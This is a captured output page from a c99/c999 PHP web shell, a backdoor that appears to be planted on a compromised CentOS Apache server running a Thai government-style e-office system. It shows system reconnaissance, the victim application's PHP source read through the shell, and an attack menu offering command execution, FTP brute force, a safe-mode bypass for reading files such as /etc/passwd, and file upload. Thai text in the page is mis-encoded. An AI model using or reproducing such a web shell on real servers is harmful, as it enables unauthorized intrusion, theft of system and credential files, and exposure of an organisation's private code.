!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/eoffice/admin/   drwxr-xr-x
Free 50.91 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectstatusSendDocforSign.php (11.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header
("content-type: application/x-javascript; charset=TIS-620");
?>
<script src="getinfo.js"></script>
<script>
function On_Year(DLCID,MaxDocGroup,DlcPS2,y){
    searchYear=y;
    if (searchYear.length == 4) {
        ShowInfostatusSendDocforSign(DLCID,MaxDocGroup,DlcPS2);
    }
}
</script>
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsDocSendtoPsTmp.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc1 = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDsl2 = new DocSpeedLevel($oC);
$oDcl2 = new DocSecretLevel($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs5 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oStmp=new DocSendToPsTmp($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();
$oDlc->SearchByKey($DLCID); $oDlc->GetRecord();
$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
if(
$oDlp1->DlpPID!="0"){ 
            
//$DlcPS2=$DLCID;
            
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
}else{
            
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
}
?>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"  style="border-collapse:collapse">
            <tr><td align="right"><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">
            ¤é¹ËÒ˹ѧÊ×Í (àÃ×èͧ/ÇèÒ´éÇÂ)</font>&nbsp;<input name="searchName" type="text" size="25" value="<? echo a2th($searchName); ?>"><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">&nbsp;(·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè)</font>&nbsp;<input name="searchNo" type="text" size="20" value="<? echo a2th($searchNo); ?>">&nbsp;&nbsp;
            <br>»ÃШÓà´×͹</font>&nbsp;
            <select name="monthe" onChange="ShowInfostatusSendDocforSign('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>')">
                <option value="01" <? if($monthe=="01"){ echo "selected";   }?>>Á.¤.</option>
                <option value="02" <? if($monthe=="02"){ echo "selected";   }?>>¡.¾.</option>
                <option value="03" <? if($monthe=="03"){ echo "selected";   }?>>ÁÕ.¤.</option>
                <option value="04" <? if($monthe=="04"){ echo "selected";   }?>>àÁ.Â.</option>
                <option value="05" <? if($monthe=="05"){ echo "selected";   }?>>¾.¤.</option>
                <option value="06" <? if($monthe=="06"){ echo "selected";   }?>>ÁÔ.Â.</option>
                <option value="07" <? if($monthe=="07"){ echo "selected";   }?>>¡.¤.</option>
                <option value="08" <? if($monthe=="08"){ echo "selected";   }?>>Ê.¤.</option>
                <option value="09" <? if($monthe=="09"){ echo "selected";   }?>>¡.Â.</option>
                <option value="10" <? if($monthe=="10"){ echo "selected";   }?>>µ.¤.</option>
                <option value="11" <? if($monthe=="11"){ echo "selected";   }?>>¾.Â.</option>
                <option value="12" <? if($monthe=="12"){ echo "selected";   }?>>¸.¤.</option>
              </select>
                    &nbsp;<input name="searchYear" type="text" size="5" maxlength="5" value=<? if($searchYear!=""){  echo a2th($searchYear);  }else{  echo a2th(Date('Y')+543); } ?> onKeyUp="On_Year('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>')" onKeyPress="event.keyCode=CheckInput(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;">
                    <input name="searchNamesub" type="button" value="¤é¹ËÒ" onClick="ShowInfostatusSendDocforSign('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>')">&nbsp;&nbsp;</td></tr>
            </table>
          <table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA"  style="border-collapse:collapse"  background="<? if($DtID=="5" || $DtID=="6" || $DtID=="7" || $DtID=="9" || $DtID=="10" || $DtID=="11" || $DtID=="12" || $DtID=="13"){ echo "../picture/table_header_bg6.gif"; }else{ echo "../picture/table_header_bg5.gif";  }?>">
             <?  $flagshow=1;?>
              <tr height=22>
      <td width="5%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>àÅ¢Êè§</strong></font></td>
      <td width="43%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>àÃ×èͧ/ÇèÒ´éÇ (ª¹Ô´Ë¹Ñ§Ê×Í)</strong></font></td>
       <td width="10%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>Çѹ·ÕèÃѺ˹ѧÊ×Í</strong></font></td>
      <td width="2%" align="center"><img src="../picture/rapid0.jpg" alt=""  border="0" ></td>
          <td width="2%" align="center"><img src="../picture/secret0.jpg" alt=""  border="0" ></td>
        </tr>
          
          <?
                  
//--------------------------------find count
                   
$oDlc->SearchByKey($DLCID); $oDlc->GetRecord(); 
                
$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
                if(
$oDlp1->DlpPID!="0"){ 
                    
//$DlcPS2=$DLCID;
                    
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
                 }else{
                    
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
                }

                if(
$GroupID=="110" || $GroupID=="111" || $GroupID=="112" || $GroupID=="115"){ 
                        
$oDlp->SearchByKey($oDlc->DlpID);  $oDlp->GetRecord();
                        if(
$oDlp->DlpPID=="0"){  $a=2$b=1;   }else{  $a=3$b=2;  }
                                
$DlcSeq=$oDlc->DlcSeq-$a;   
                                
$DlcSeq2=$oDlc->DlcSeq-$b
                                
$oDlc3->SearchByNextDlcID($DlcSeq,$oDlc->docGroup,$oDlc->deptId); $oDlc3->GetRecord();   $DLCID2=$oDlc3->DlcID;
                            
                                if(
$oDlp->DlpPID=="0"){  
                                    
$oDlc4->SearchByNextDlcID($DlcSeq2,$oDlc->docGroup,$oDlc->deptId); $oDlc4->GetRecord();  $DlcPS22=$oDlc4->DlcID;
                                }else{ 
                                    
$oDlc4->SearchByNextDlcID($DlcSeq2,$oDlc->docGroup,$oDlc->deptId); $oDlc4->GetRecord();  $DlcPS22=$oDlc4->DlcID;
                                    
//$DlcPS22=$DLCID2;
                                
}
                                
$numrow=0;
                                
$oDoc4->SearchGetDocForSignDlcID($MaxDocGroup,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$DLCID2,$DlcPS22);        
                                
$numRow $oDoc4->NumRow();
                                
//echo "===========".$numRow;
                                
$total_page = (int)($numRow/$GLOBALS['PAGE_SIZE']);
                                if((
$numRow%$GLOBALS['PAGE_SIZE']) != 0)
                                    
$total_page++;
        
                                if(isset(
$page_id))
                                    
$start $GLOBALS['PAGE_SIZE']*($page_id-1);
                                else {
                                    
$page_id 1;
                                    
$start 0;
                                }                                
                                
//$oDoc->SearchDocforSignMainPs($DLCID2,$MaxDocGroup,$DlcPS22,$DLCID);
                                
$oDoc3->SearchGetDocForSignDlcIDLimit($MaxDocGroup$start$GLOBALS['PAGE_SIZE'],$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$DLCID2,$DlcPS22);
                }else{
                                
$oDoc4->SearchGetDocForSignDlcID($MaxDocGroup,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$DLCID,$DlcPS2);        
                                
$numRow $oDoc4->NumRow();
                                
//echo "===========".$numRow;
                                
$total_page = (int)($numRow/$GLOBALS['PAGE_SIZE']);
                                if((
$numRow%$GLOBALS['PAGE_SIZE']) != 0)
                                    
$total_page++;
        
                                if(isset(
$page_id))
                                    
$start $GLOBALS['PAGE_SIZE']*($page_id-1);
                                else {
                                    
$page_id 1;
                                    
$start 0;
                                }
                    
//$oDoc->SearchByDlcIDDocGroupPSDlcID2DsID3DrsSendDateDrsSEndnotY($DLCID,$MaxDocGroup,$DlcPS2);
                    //$oDoc->SearchDocforSign($DLCID,$MaxDocGroup,$DlcPS2,$DLCID);
                    
$oDoc3->SearchGetDocForSignDlcIDLimit($MaxDocGroup$start$GLOBALS['PAGE_SIZE'],$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$DLCID,$DlcPS2);
                    
                }                        
                        
            
$z=0;                
            while(
$oDoc3->GetRecord()){ 
                            if((
$z%2) == 0)   
                                              echo 
"<tr bgcolor=\"#FFFFFF\" height=22 >";
                                        else
                                              echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\"  height=22>";
            
?>
      <td align="center">
      <?      
                $oDoc4
->SearchByKey($oDoc3->DocID);
                
$oDoc4->GetRecord();
                echo 
$oDoc4->DocTypeNo;
        
?>
      </td>
      <td align="left">&nbsp;<?  echo $oDoc3->DocSubject;  ?>
      &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_5"]; ?>" size="2"><? $oDt->SearchByKey($oDoc3->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")";?></font>
      </td>
      <td align="center">            
      <?    if($oDoc3->getDate!="0000-00-00 00:00:00"){    
                                  list(
$DocD,$DocT) = split(' ',$oDoc3->getDate);
                                echo 
"ÃѺ˹ѧÊ×ÍáÅéÇ<br>".abbreDate2($DocD,'/')."<br>".a2th($DocT);
                }else{
                                echo 
"ÂѧäÁèä´éÃѺ˹ѧÊ×Í";
                }
        
?></td>
       <? if($oDoc3->DslID=="0"){ $rapid="../picture/rapid0.jpg"$rapidname=$oDsl2->SearchName(0);    }else if($oDoc3->DslID=="1"){  $rapid="../picture/rapid1.jpg"$rapidname=$oDsl2->SearchName(1);   }else if($oDoc3->DslID=="2"){  $rapid="../picture/rapid2.jpg"$rapidname=$oDsl2->SearchName(2);   }else if($oDoc3->DslID=="3"){ $rapid="../picture/rapid3.jpg"$rapidname=$oDsl2->SearchName(3);    }else{  $rapid="../picture/blank.gif";  $rapidname="";  }?>
            <td align="center"><img src="<? echo $rapid?>" alt="<? echo $rapidname?>"  border="0" ></td>
              <? if($oDoc3->DclID=="0"){ $secret="../picture/secret0.jpg";  $secretname=$oDcl2->SearchName(0);  }else if($oDoc3->DclID=="1"){  $secret="../picture/secret1.jpg"$secretname=$oDcl2->SearchName(1); }else if($oDoc3->DclID=="2"){  $secret="../picture/secret2.jpg";  $secretname=$oDcl2->SearchName(2);}else if($oDoc3->DclID=="3"){ $secret="../picture/secret3.jpg";  $secretname=$oDcl2->SearchName(3);  }else if($oDoc3->DclID=="4"){   $secret="../picture/secret4.jpg";   $secretname=$oDcl2->SearchName(4); }else{  $secret="../picture/blank.gif";  $secretname="";}?>        
            <td align="center"><img src="<? echo $secret?>" alt="<? echo $secretname?>"  border="0" ></td>
      </tr>
           <? $z++; }  if($z=="0"){?>
          <tr height=22><td align="center" bgcolor="#FFFFFF" colspan="7"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">** äÁèÁÕÃÒ¡ÒÃ˹ѧÊ×Í·ÕèÊ觶֧¼ÙéÃѺ¼Ô´ªÍºáÅéÇ **</font></td></tr>
          <? }  ?>
           <tr height=22 bgcolor="#DADADA"><td align="right" colspan="7"><strong>˹éÒ-&gt;</strong>
<?php 
                    
for ($num=1$num<=$total_page$num++) {    
                        if(
$num == $page_id)
                            echo  
a2th($num)." ";
                        else {
?>
                            <a href="statusDocforSign.php?page_id=<?php echo $num;?>&flagshow=<? echo $flagshow?>&monthe=<? echo $monthe;?>&searchYear=<? echo $searchYear?>&searchName=<? echo $searchName?>&searchNo=<? echo $searchNo?>"><?php echo '[ 'a2th($num).' ]'; if($num==14){echo "<br>";}?></a>
<?php
                        
}
                    }
?>&nbsp;&nbsp;</td></tr>
          
          </table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0073 ]--